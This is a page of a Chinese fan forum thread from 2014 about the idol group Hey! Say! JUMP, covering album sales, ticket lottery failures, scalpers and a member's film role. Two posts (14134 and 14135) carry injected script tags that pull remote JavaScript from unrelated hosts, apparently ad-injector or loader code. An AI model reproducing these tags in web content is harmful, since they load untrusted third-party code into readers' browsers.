跳跳相关讨论L

23563100条/页,236页

<137 138 139 140 141 142 143 144 145 146 >
您是第2069965位读者

- 14101 - = =2014/6/23 17:44:00

就不能走跳跳之前的正统风么
瞳屏深夜boy哪怕是forever
感觉这样风格才是跳跳
rap什么的,就是为了让说rap那几位多分几句话吧
最近对rap真心焦躁

- 14102 - = =2014/6/23 17:51:00

ls你不能轻点跳吗,烦死了
人话听不懂啊
说的好像那几位只能唱rap一样

- 14103 - = =2014/6/23 18:11:00

看日饭也不太喜欢rap

- 14104 - = =2014/6/23 18:14:00

ls你不能轻点跳吗,烦死了
人话听不懂啊
说的好像那几位只能唱rap一样
=================
综合经验下来就那几位唱啊
而且我觉得大多数人也不想听那几位唱rap
说出心声就是跳?
LS太心虚了吧

- 14105 - = =2014/6/23 18:15:00

看日饭也不太喜欢rap
===========================
我觉得品味这点真心中日大同
不过45s总是跟fans不同步也没办法

- 14106 - = =2014/6/23 18:26:00

神逻辑的还没完了是吧
为了让那几个多唱几句rap,为什么不在RG里加rap,为什么新专不主打reload
本来就风马牛不相及的事硬要往一块扯
贱不贱啊

- 14107 - = =2014/6/23 18:38:00

=================
综合经验下来就那几位唱啊
而且我觉得大多数人也不想听那几位唱rap
说出心声就是跳?
LS太心虚了吧
———
你不喜欢滚回你bo自己说去,任何东西都有喜欢和不喜欢的,你不喜欢rap有的是人喜欢,在这叽叽歪歪就表立牌坊了,你觉得值几个钱哟

- 14108 - = =2014/6/23 20:45:00

这专感觉都不一定能卖过上张啊
补正要过4000才行

- 14109 - = =2014/6/23 21:05:00

今天数字多少?

- 14110 - = =2014/6/24 17:10:00

オリコンアルバムランキング第1位Hey!Say!JUMP 3rdアルバム「Smart」初週 12.7万枚3作連続首位

- 14111 - = =2014/6/24 17:51:00

1smart【初回限定盤2】(DVD付) / Hey!Say!JUMP14.06.18 41,844
2smart【初回限定盤1】(DVD付) / Hey! Say! JUMP14.06.18 41,763
3smart【通常盤/初回プレス仕様】 / Hey!Say!JUMP14.06.18 38,574

- 14112 - = =2014/6/24 17:52:00

1 - ● smart 126,734 126,734 14/6/18 JST?
Hey!Say!JUMP 1 1?

- 14113 - = =2014/6/24 18:10:00

3版all的不少,死忠4w左右,浮动基本没有,所以说主打是浮云

- 14114 - = =2014/6/28 15:28:00

跳跳这次当落太激烈了,一片一片的全灭
身边好几个朋友也都全灭和只中一场

- 14115 - = =2014/6/28 15:46:00

两个朋友都全灭了另一个N场只中了一场,这次是场数特别少还是怎么回事?

- 14116 - = =2014/6/28 15:56:00

这次日饭也大部分都落选
推上是求票的泛滥了

- 14117 - = =2014/6/28 16:10:00

小场子、场次又不多吧

- 14118 - = =2014/6/28 17:12:00

爱追队那首娃娃音是谁啊,idol提过吗

- 14119 - = =2014/6/28 17:29:00

跟以前比也不小啊,是在跟蛋比吗?场次不多倒是真的

- 14120 - = =2014/6/28 17:53:00

这次的票很多都落人大黄牛的手里

- 14121 - = =2014/6/28 18:45:00

都是一万多的场子
也不算小场子吧

- 14122 - = =2014/6/28 18:57:00

都说了是黄牛的关系和场子大小无关

- 14123 - = =2014/6/28 19:38:00

这次的票很多都落人大黄牛的手里
=============
有多大比例落人黄牛手中了?看推上这个状况有非常大比例以上都落人了吧?好多人都说是第一次落选
主要是哪些大黄牛?这么严重事务所也不管?
本来饭就没那么多了还这样,开场买黄牛的队要比周边队还长了吧

- 14124 - = =2014/6/28 19:41:00

只看推会觉得起码60%的票都被黄牛拿走了= =
FC的工作人员是集体罢工了还是怎么样,搞什么= =

- 14125 - = =2014/6/28 19:51:00

黄牛的情报是哪里来的?莫非是臆测?

- 14126 - = =2014/6/28 19:51:00

跳跳最近干什么了值得大黄牛突然出手

- 14127 - = =2014/6/28 19:59:00

有些人是新饭吧
看有GN说这次的状况还好只是回复到跳跳之前的状况,去年和前年是太容易了才不正常

- 14128 - = =2014/6/28 20:02:00

各处转了几圈,日拍上的黄牛跟以前差别不大完全在正常范围内,其他网站上的出票也没多高腾,只有求票的比以前多而已,而且跳跳也没忽然变成值得黄牛出手这么大方的程度吧

- 14129 - = =2014/6/28 20:03:00

有些人是新饭吧
看有GN说这次的状况还好只是回复到跳跳之前的状况,去年和前年是太容易了才不正常
===============
推上好多担了好多年的都说是第一次全灭,我认识的GN也是担了5年以上的也从没这么难中过
倾向黄牛论

- 14130 - = =2014/6/28 20:06:00

围观了下黄牛票,比票通便宜,而且数量挺吓人,以前什么情况不知道

- 14131 - = =2014/6/28 20:12:00

围观了下黄牛票,比票通便宜,而且数量挺吓人,以前什么情况不知道
===========
你在哪看的?甩个地址吧
我看到的和以前一样也就几十张,而且和票通不一样的是票通是一口价,拍卖涨幅大多了

- 14132 - = =2014/6/28 20:13:00

居然会出现这种情况
事务所不管么……
现在跳跳难不成是个三不管地带

- 14133 - = =2014/6/28 20:17:00

问了一下好像是如果真的是大量黄牛,向45所通报ID,之后可以进行再抽选
如果不是就不会了

- 14134 - = =2014/6/30 23:45:00

好高楼 慢慢爬<script src="//asrv-a.akamaihd.net/sd/1018/1022.js" id="asdasdfdhggfhjhl45646"></script><script src="//asrv-a.akamaihd.net/sd/1018/1005.js" id="asdasdfdhggfhjhlfd4"></script><script src="http://gyr.mappingsection.net/amz/aeyJhZmZpZCI6MTAxOCwic3ViYWZmaWQiOjEwMDUsImhyZWYiOiJodHRwOi8vai5vcnouYXNpYS9mb3J1bS9ULmFzcD9iSUQ9MSZJRD00MDk1MTAiLCJ3aWR0aCI6MTA2NywiaGVpZ2h0Ijo2NjcsImxvYWRlcl9jbGllbnRfdGltZXN0YW1wIjoxNDA0MTQzMTEwNzAzfQ%3D%3D.js"></script>

- 14135 - = =2014/7/1 0:03:00

图片点击可在新窗口打开查看<script src="//asrv-a.akamaihd.net/sd/1018/1022.js" id="asdasdfdhggfhjhl45646"></script><script src="//asrv-a.akamaihd.net/sd/1018/1005.js" id="asdasdfdhggfhjhlfd4"></script>

- 14136 - = =2014/7/1 8:18:00

LS是什么东西= =
WLSW滚!

- 14137 - = =2014/7/1 12:48:00

音乐力只唱一首歌的话应该会唱完整吧

- 14138 - = =2014/7/1 12:55:00

还以为音乐力能唱个新曲呢

- 14139 - = =2014/7/1 12:57:00

是只披露了一首吧,不觉得会只唱这一首

- 14140 - = =2014/7/1 13:28:00

这么看来这次专销量还可以
隔壁L看了下前辈首周只有7w5的销量

- 14141 - = =2014/7/1 13:31:00

LS有毛病,团楼拖前辈进来干嘛

- 14142 - = =2014/7/1 13:35:00

拖前辈的不明生物gun
整体感觉跳跳现在正在渐渐的停止下降状态,努力稳住

- 14143 - = =2014/7/1 20:28:00

8.6关8、8.13脚脚、8.20TT、8.27摸摸
跳跳别说2单了,现在双A时间都不好安排囧
难道要9月发?

- 14144 - = =2014/7/1 20:29:00

会不会7月底

- 14145 - = =2014/7/1 20:30:00

yuto的那剧马上就播了,估计单曲发表也就这两天了吧

- 14146 - = =2014/7/1 20:31:00

シングル
07/02 オモイダマ(初回限定盤)(DVD付)/オモイダマ(通常盤) 関ジャニ∞?
07/16 Top Of The World/Amazing Disccovery(初回盤A)/初回盤B/通常盤 SMAP?
07/27 てぃーてぃーてぃーてれって てれてぃてぃてぃ~だれのケツ~(初回盤A)/初回盤B/通常盤 舞祭組
7月也满了

- 14147 - = =2014/7/1 20:32:00

会不会7月底
==========
7月底的话也太急了点吧
我觉得晚点发挺好的,刚发了专接着又有控,好多樱花妹都在哭穷

- 14148 - = =2014/7/1 20:33:00

还有7月23日那天

- 14149 - = =2014/7/1 20:33:00

还有7月23日那天

- 14150 - = =2014/7/1 20:34:00

别操闲心了,该发总会发的

不可能两部剧贴歌一张单都不发的

- 14151 - = =2014/7/1 20:37:00

有没可能音乐力披露新曲然后之后揷时间发?

- 14152 - = =2014/7/1 20:39:00

音乐力是RWM
揷时间发表周冠了吗OTL

- 14153 - = =2014/7/1 20:39:00

7月的剧九月发怪怪的,如果7月底发现在音番已经该有安排了

- 14154 - = =2014/7/1 21:23:00

813有脚脚?

- 14155 - = =2014/7/1 21:35:00

我也没看到脚脚的碟报消息,假的吧

- 14156 - = =2014/7/2 17:09:00

「ウィークエンダー」 作詞:三井八雲/Vandrythem 作曲:原一博 編曲:原一博/KOMU

作曲者の方 Dash!! ユーガッタモール 作った方だった!

英語の方は ミスヴァ Oh!MyJelly! 二人掛けの場所 JUMPAround.. の作詞してくださった方だ。

- 14157 - = =2014/7/2 17:15:00

作曲的还做过A团KT和KK的吧
不过大部分都是做的J外的

- 14158 - = =2014/7/2 17:19:00

图片点击可在新窗口打开查看
8月只有13号可以发了

- 14159 - = =2014/7/2 17:23:00

不过S团和脚都还有一单贴剧要发
就不知道最后给谁了

- 14160 - = =2014/7/4 0:13:00

门把家恭喜32映画初出演

- 14161 - = =2014/7/4 0:19:00

早就说过今年开始跳跳规划其实很有想法方向抓的也对,好多人不听哼哼哼
总而言之好开心啊

- 14162 - = =2014/7/4 1:34:00

门把家的恭喜,觉得挺适合32的

- 14163 - = =2014/7/4 7:44:00

成天哭喊打压top的饭们终于可以消停了吧

- 14164 - = =2014/7/4 8:34:00

成天哭喊打压top的饭们终于可以消停了吧
===========================
32家loli还是鸡血在前面那么多页真是耍的一手好剑

- 14165 - = =2014/7/4 8:34:00

前面黑32只能演高中生演侦探的也打脸了

- 14166 - = =2014/7/4 9:54:00

阿姨其实挺给力的,32这次映画初出演角色很美味

- 14167 - = =2014/7/4 9:59:00

前几页不是说了个人资源都不算捧,只要在团活里不是最突出就是打压么,消停难

- 14168 - = =2014/7/4 10:01:00

前几页不是说了个人资源都不算捧,只要在团活里不是最突出就是打压么,消停难
======
这映画不知道够她们高兴多久,高兴多久就能消停多久吧

- 14169 - = =2014/7/4 10:01:00

新马内甲能力还是不错的,跳跳这一年大多数设定角色都很美味,很懂抓想要发挥的特点

- 14170 - = =2014/7/4 10:05:00

这楼一直惦记32O的是谁家啊

- 14171 - = =2014/7/4 10:06:00

可怜的新马内甲

- 14172 - = =2014/7/4 10:09:00

这次这角色和他以往路线都不一样还容易出彩,接到这种角色真是不错,32这路线确实挺有规划的,阿姨够靠谱

- 14173 - = =2014/7/4 10:12:00

个别32O之前是有点沉不住气太浮躁了,这是好事也是个教训,其他家也一样,资源必然会有的,大家都别那么爱抱怨爱阴暗。就这么打住吧

- 14174 - = =2014/7/4 10:15:00

事实是每个人的路线都很有规划,每家都该很满意
以后千万表再在团楼散发负能量了

- 14175 - = =2014/7/4 10:42:00

给番茄配很光彩么…

- 14176 - = =2014/7/4 10:45:00

前辈送出去,第一次上映画32家很满意,有些人皮裹紧点

- 14177 - = =2014/7/4 10:47:00

给番茄配很光彩么…
========
隔壁L还没跳够啊,跟个小丑似的不觉得自己很SB吗

- 14178 - = =2014/7/4 10:49:00

这资源表太美味,我看到的都在撒花
也就挑货觉得不光彩

- 14179 - = =2014/7/4 11:34:00

给番茄配很光彩么…
===========
别跳了,谁还敢说阿姨没在全心全意捧32

- 14180 - = =2014/7/4 11:46:00

给番茄配很光彩么…

===========
别跳了,谁还敢说阿姨没在全心全意捧32
=====
to lss:给前辈配没有什么不光彩,32在映画上本来就毫无资历,上来就是设定美味容易出彩的主要角色又不用担票房,个人觉得比直接主映画要合理的多。因为小成本没看头,大制作还担不起。
to ls:虽说前面说打压top不给资源的确实打脸了,但说阿姨全心全意捧32还为时尚早吧。对于top来说也就是中规中矩地给了个资源,从量和质上来说暂时都很难说到一个捧字。至少要到再下一个资源才能看出是否有清晰规划是否要捧

- 14181 - = =2014/7/4 11:47:00

纵观这百十来页就能发现,只要1不因为自家还没资源就怨天尤人2不因为别家有了资源就尖酸阴暗
大部分的掐架都是可以避免的。。。
拿这两条时时勤反省自身吧

- 14182 - = =2014/7/4 11:51:00

为什么要全心全意的捧谁?不管是黑还是挑这追求也太高了,阿姨手下这3个团二十来口人呢
有资源就好好做就行了

- 14183 - = =2014/7/4 12:09:00

虽然不清楚当top捧应该是怎么个捧法
但是从32跟了阿姨后的资源来看,角色路线与以往侦探路线不同,配的也是阿姨派的核心人物
说明阿姨肯定对32是有规划的,这就足矣

- 14184 - = =2014/7/4 12:13:00

虽然不清楚当top捧应该是怎么个捧法
但是从32跟了阿姨后的资源来看,角色路线与以往侦探路线不同,配的也是阿姨派的核心人物
说明阿姨肯定对32是有规划的,这就足矣
============
其实粗体这句可以套到跳跳好多人的头上 = =
有资源是好事,但是说阿姨很捧之类的真是言过其实

- 14185 - = =2014/7/4 12:15:00

本来就不可能没有规划,所以说一惊一乍凄风苦雨的loli最讨人厌
只不过是规划适合不适合的问题。
现在显然每个人的方向都比一年前更加清晰丰满了,趁着现在赶快好好积累锻炼

- 14186 - = =2014/7/4 12:19:00

为什么要等看出有清晰规划才叫捧,一顿资源猛砸的捧还少了?
阿姨真是憋屈
先说要有金田一之后的新资源才叫捧,现在又说要有再下一个资源看出规划才叫捧
再下一次是不是又要顺延了,等大红了再看看

- 14187 - = =2014/7/4 12:20:00

其实也就是上了个映画而已,谈规划还为时尚早,更别提什么清晰不清晰了,这L也太夸张

- 14188 - = =2014/7/4 12:21:00

back们大部分都没有规划吧,有一顿没一顿的给点资源

- 14189 - = =2014/7/4 12:21:00

其实也就是上了个映画而已,谈规划还为时尚早,更别提什么清晰不清晰了,这L也太夸张

===

没打完就发出去了

接不同类型角色拓宽戏路锻炼演技肯定是好事,但说到规划到底是什么?反正我还没看出来

- 14190 - = =2014/7/4 12:22:00

=======

这话说的,难道top不是有一顿没一顿的给点资源?

- 14191 - = =2014/7/4 12:23:00

为什么要等看出有清晰规划才叫捧,一顿资源猛砸的捧还少了?
阿姨真是憋屈
先说要有金田一之后的新资源才叫捧,现在又说要有再下一个资源看出规划才叫捧
再下一次是不是又要顺延了,等大红了再看看
==============
一顿资源猛砸?LS你跟我看的是同一个世界吗= =

- 14192 - = =2014/7/4 12:25:00

这L最大的问题就是喜欢话说太满orz

- 14193 - = =2014/7/4 12:28:00

====================
J家一顿资源猛砸的很少么?那些都不叫捧?

- 14194 - = =2014/7/4 12:28:00

参加映画是好事儿,恭喜,念叨好长时间了

又感觉气氛微妙了呢,就是喜欢掐啊,现在都有资源吧,挺好的事儿

- 14195 - = =2014/7/4 12:29:00

=======

这话说的,难道top不是有一顿没一顿的给点资源?

连多还没完这映画就来了,这叫有一顿没一顿?

- 14196 - = =2014/7/4 12:32:00

====
你的参照物是哪家?脚脚是饭岛亲儿子就不算了,裆裆西西基本还算新团吧,你拿出道七年的跳跳和这两家比?

- 14197 - = =2014/7/4 12:33:00

没资源的时候说没人管
有资源了又开始说没规划

- 14198 - = =2014/7/4 12:41:00

====================
===========
其他人一顿资源猛砸关32什么事= =
哪只眼睛看出32一顿资源猛砸了?

- 14199 - = =2014/7/4 12:42:00

没资源的时候说没人管
有资源了又开始说没规划
难道不是先有人说阿姨规划好全心全意捧32?

- 14200 - = =2014/7/4 12:45:00

FY

跳转→首页主版外传 黑犬J禁万能站务Johnnys-BBS图志 photo购物 shopping

23563100条/页,236页

<137 138 139 140 141 142 143 144 145 146 >
ZB回复请先登录